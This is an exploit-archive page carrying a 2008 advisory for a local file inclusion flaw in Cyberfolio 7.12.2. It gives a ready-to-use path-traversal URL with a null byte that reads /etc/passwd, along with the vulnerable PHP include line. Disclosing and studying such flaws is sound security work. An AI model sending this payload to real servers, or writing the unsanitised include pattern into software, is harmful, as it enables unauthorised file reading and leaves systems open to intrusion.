[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Cyberfolio <= 7.12.2 (css.php theme) Local File Inclusion Vulnerability
# Published : 2008-11-08
# Author : dun
# Previous Title : Mambo Component n-form (form_id) Blind SQL Injection Exploit
# Next Title : Zeeways Shaadi Clone 2.0 Auth Bypass Vulnerability
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun dun[at]strcpy.pl ]
##################################################################
# [ Cyberfolio <= 7.12.2 ] Local File Inclusion Vulnerability #
##################################################################
#
# Script site: http://cyberfolio.org/
# Download: http://cyberfolio.org/Version-7-12-2
#
# Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00
#
# Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33)
#
# ...
# if (file_exists("./themes/".$_GET[theme].".php")) {
# include_once("./themes/".$_GET[theme].".php"); // LFI
# }
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
# www.Syue.com [2008-11-08]